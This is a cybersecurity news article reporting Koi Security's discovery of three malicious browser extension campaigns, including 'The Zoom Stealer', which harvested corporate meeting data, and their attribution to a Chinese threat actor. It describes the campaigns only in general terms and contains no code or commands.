In a short period, researchers from Koi Security have uncovered three malicious browser extension campaigns that have impacted millions of browser users worldwide. The same Chinese threat actor is thought to be behind the campaigns.
“This is the first time we've found a well-funded criminal organization responsible for several of the largest and most sophisticated campaigns we’ve ever uncovered,” said the researchers.
They explained that the latest attack campaign has impacted 2.2 million users of Google Chrome, Microsoft Edge, and Mozilla Firefox. The threat actor allegedly behind the campaign is tracked under the moniker DarkSpectre.
According to Koi Security, the campaign, codenamed The Zoom Stealer, employs a set of 18 extensions across Chrome, Edge, and Firefox to facilitate corporate intelligence by collecting online meeting-related data, including meeting URLs with embedded passwords, meeting IDs, topics, descriptions, scheduled times, and registration status.
The majority of the extensions are engineered to mimic tools for enterprise-oriented videoconferencing applications, such as Google Meet, Zoom, and GoTo Webinar, in order to exfiltrate meeting links, credentials, and participant lists in real-time over a WebSocket connection.
They’re also capable of harvesting details about webinar speakers and hosts, and session metadata – when, of course, a user visits a webinar registration page via the browser with one of the malicious extensions installed.
“This isn't consumer fraud – this is corporate espionage infrastructure,” researchers Tuval Admoni and Gal Hachamov said.
“The Zoom Stealer represents something more targeted: systematic collection of corporate meeting intelligence. Users got what was advertised. The extensions earned trust and positive reviews. Meanwhile, surveillance ran silently in the background.”
The first campaign, ShadyPanda, was unmasked by Koi Security earlier in December. It was found to affect 5.6 million users by facilitating data theft, search query hijacking, and affiliate fraud.
The second campaign, GhostPoster, was found hiding malicious JavaScript inside Firefox extension logo files. Once installed, the co-opted extensions allow attackers to gain full control of the victim’s browser.
The Chinese links to the campaigns are based on clues such as consistent use of command-and-control servers hosted on Alibaba Cloud, ICP registrations linked to Chinese provinces like Hubei, code artifacts containing Chinese-language strings and comments, and fraud schemes specifically aimed at Chinese e-commerce platforms such as JD.com and Taobao.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked